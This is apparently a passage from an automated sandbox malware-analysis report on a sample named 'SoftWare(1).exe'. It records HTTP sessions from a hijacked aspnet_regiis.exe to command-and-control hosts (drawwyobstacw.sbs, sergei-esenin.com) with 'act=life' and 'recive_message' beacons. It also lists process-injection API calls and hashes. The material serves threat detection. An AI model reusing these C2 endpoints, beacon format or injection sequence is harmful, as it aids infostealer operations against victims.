2024-10-14 03:01:07 UTC	815	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 03:01:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dtgel0hoa4ndkfqdbrlr9utc7l; expires=Thu, 06 Feb 2025 20:47:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MBkJSLLc071PxuuxhxNSrBvtQnIMbtaZrXcGr%2B6FkwWAZKLCxdmBCmjEPQZ30vpXNKXdVzFQ6xiQl9Ta9KAsltjg5N6cZdJYu92EUcK1v3LVmL0NVlFiLnpfjCPmBkmjxzaR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d2452b22be50f77-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 03:01:07 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 03:01:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	188.114.96.3	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 03:01:08 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawwyobstacw.sbs
2024-10-14 03:01:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 03:01:08 UTC	827	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 03:01:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s270prj9g5afv2d5jqqakbb0gd; expires=Thu, 06 Feb 2025 20:47:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbeYB3JPBZYDpUzHof5xs9440LMGyraHAN7w1lGYeOY3Vwvrv7y%2BMmQGJT%2FVLHKjgKu%2BGHoB7H5RX5tBAOlxoiHCoJ9nnzbwFrIIQipnEbrMkOCHHyALdlgkCvh1PFJ4ta9aPQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d2452b81febde97-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 03:01:08 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 03:01:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	104.102.49.254	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 03:01:09 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-14 03:01:10 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 14 Oct 2024 03:01:10 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=08024daf03b80e56d8831b23; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-14 03:01:10 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-14 03:01:10 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-14 03:01:10 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-14 03:01:10 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49739	104.21.53.8	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 03:01:11 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sergei-esenin.com
2024-10-14 03:01:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-14 03:01:11 UTC	555	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 03:01:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=svii26yPCRabgKY%2BeKQLsAUU9Vwr%2BDGNNwHjU7BHKgThiEUIhxavFvpzBtrdf%2FZ9aOMdGki5SnjRi6Pv1toVQMVKie3PmV2n9FpyJ2jCklSbMin3%2FojGAyWzPtqeyPykrddiDQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d2452c8fda20f6b-EWR
2024-10-14 03:01:11 UTC	814	IN	Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-14 03:01:11 UTC	1369	IN	Data Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
2024-10-14 03:01:11 UTC	1369	IN	Data Raw: 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 Data Ascii: agement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <i
2024-10-14 03:01:11 UTC	889	IN	Data Raw: 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 Data Ascii: <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="b
2024-10-14 03:01:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49740	104.21.53.8	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 03:01:11 UTC	354	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=1XYT51TuC4g_X2vBeD8OSXAP7fq2lr4kj4ls6Z9CPMI-1728874871-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 85 Host: sergei-esenin.com
2024-10-14 03:01:11 UTC	85	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 58 58 58 58 72 74 79 30 35 32 26 6a 3d 31 30 65 38 31 65 62 62 37 38 36 39 33 33 34 63 30 66 39 66 61 30 66 33 30 39 34 30 35 62 62 33 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@XXXXrty052&j=10e81ebb7869334c0f9fa0f309405bb3
2024-10-14 03:01:12 UTC	835	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 03:01:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u889pr2f2n3tqid2lhm728d3d3; expires=Thu, 06 Feb 2025 20:47:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9nCR2YFyM7hpzdNEvH3QmLW%2FIKYWRhgTaqnnEFq1GfL6ZoucmGS1R34zgSkjbw4AZ%2BHX4%2FPPfupzCfPbAQOf3IivYyGmIOyUtjvTTPKCqIAV%2Fzjyomvk%2BafH79q%2BuN%2FDajnyfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d2452ce6a100f74-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 03:01:12 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 03:01:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	23:00:59
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\SoftWare(1).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SoftWare(1).exe"
Imagebase:	0xdd0000
File size:	359'936 bytes
MD5 hash:	3ADC9C7905F10B8C2C0B0BB7826B67A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:00:59
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:01:00
Start date:	13/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x5c0000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	23:01:12
Start date:	13/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 1724
Imagebase:	0x1c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.1%
Total number of Nodes:	997
Total number of Limit Nodes:	17

Executed Functions

Function 6CF4C4F0 Relevance: 81.3, APIs: 21, Strings: 21, Instructions: 7769injectionthreadmemoryCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 6CF51BD2
ShowWindow.USER32 ref: 6CF51BE8
VirtualAlloc.KERNELBASE ref: 6CF51D0E
CreateProcessW.KERNELBASE ref: 6CF51F50
Wow64GetThreadContext.KERNEL32 ref: 6CF520AE
VirtualAllocEx.KERNELBASE ref: 6CF521B6
VirtualAllocEx.KERNELBASE ref: 6CF5239E
WriteProcessMemory.KERNELBASE ref: 6CF523FC
WriteProcessMemory.KERNELBASE ref: 6CF526E0
ReadProcessMemory.KERNEL32 ref: 6CF52F32
WriteProcessMemory.KERNEL32 ref: 6CF53034
WriteProcessMemory.KERNELBASE ref: 6CF5334C
CreateRemoteThread.KERNEL32 ref: 6CF537DE
Wow64SetThreadContext.KERNEL32 ref: 6CF53984
ResumeThread.KERNELBASE ref: 6CF53999
CloseHandle.KERNEL32 ref: 6CF539EF
VirtualAllocEx.KERNEL32 ref: 6CF53EB4
WriteProcessMemory.KERNEL32 ref: 6CF53F85
WriteProcessMemory.KERNEL32 ref: 6CF5412C
CreateRemoteThread.KERNEL32 ref: 6CF54274

Strings

s'S, xrefs: 6CF4C510
~HU/, xrefs: 6CF5291A
B|g, xrefs: 6CF50F96
dP8, xrefs: 6CF53915
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, xrefs: 6CF51DEA
'9, xrefs: 6CF51889
P{U, xrefs: 6CF50851
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 6CF51DB9
`&#, xrefs: 6CF50B0E
+`h, xrefs: 6CF50730
D, xrefs: 6CF51D68
^+C, xrefs: 6CF5224E
MZx, xrefs: 6CF51C16, 6CF51C47
C, xrefs: 6CF4F089
P{U, xrefs: 6CF507C4
kernel32.dll, xrefs: 6CF51BEE
&aR, xrefs: 6CF4EEFB
ntdll.dll, xrefs: 6CF51C02
@, xrefs: 6CF53EAC
Ml, xrefs: 6CF53413
dP8, xrefs: 6CF538B9

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: Process$Memory$Write$Thread$AllocVirtual$Create$ContextRemoteWindowWow64$CloseConsoleHandleReadResumeShow
String ID: &aR$'9$+`h$@$B|g$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$P{U$P{U$dP8$dP8$kernel32.dll$ntdll.dll$s'S$~HU/$C$Ml$^+C$`&#
API String ID: 2788316432-1234957121
Opcode ID: ee4080451ea5ff6ddaeea6eb4e2392c0e25a35608c55fd9ff57fda9f000bc982
Instruction ID: 785f1840509a96dbc7f2f1c6cea79ec8f4c189dfaf6a553a579cd35d43108002
Opcode Fuzzy Hash: ee4080451ea5ff6ddaeea6eb4e2392c0e25a35608c55fd9ff57fda9f000bc982
Instruction Fuzzy Hash: 42D35736B55226CFCB14CE7CC9943DA7BF2AB96310F508199D919EB751CA398F888F40

Function 6CF4A540 Relevance: 36.4, APIs: 16, Strings: 4, Instructions: 1368filememoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6CF4ACA1
GetModuleHandleA.KERNEL32 ref: 6CF4ACE5
K32GetModuleInformation.KERNEL32 ref: 6CF4ADC4
CreateFileMappingA.KERNEL32 ref: 6CF4AEC8
MapViewOfFile.KERNELBASE ref: 6CF4B1D5
VirtualProtect.KERNELBASE ref: 6CF4B5B4
VirtualProtect.KERNELBASE ref: 6CF4B6AD
GetCurrentProcess.KERNEL32 ref: 6CF4B880
GetModuleHandleA.KERNEL32 ref: 6CF4B8C4

Strings

=04, xrefs: 6CF4AD76
*K,L, xrefs: 6CF4B17E
@, xrefs: 6CF4B9A5
*K,L, xrefs: 6CF4B135

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: Module$CurrentFileHandleProcessProtectVirtual$CreateInformationMappingView
String ID: *K,L$*K,L$=04$@
API String ID: 1422715119-3093642429
Opcode ID: 06d252b629959932c23f40f5bf7505fc7afc44cc1a05c8ea0919541eeca555cf
Instruction ID: 6e33294cddef6d60c741fee285cc6f525a63ad8c359839f5a332eb8d68ed521a
Opcode Fuzzy Hash: 06d252b629959932c23f40f5bf7505fc7afc44cc1a05c8ea0919541eeca555cf
Instruction Fuzzy Hash: D0B2CD76E14604CFDB08CF7CC985BDEBBF1AB4A310F1085A9E819EB756C635994A8F01

Function 6CF4BEA0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 381
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 6CF4BEBE

Strings

CYT-, xrefs: 6CF4C393
ntdll.dll, xrefs: 6CF4BEB5
NtQueryInformationProcess, xrefs: 6CF4BEC9

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: HandleModule
String ID: CYT-$NtQueryInformationProcess$ntdll.dll
API String ID: 4139908857-710202094
Opcode ID: 1e7568b3513b15b59d9a6992666f00bd07616c750d9341e1691e795e227e8409
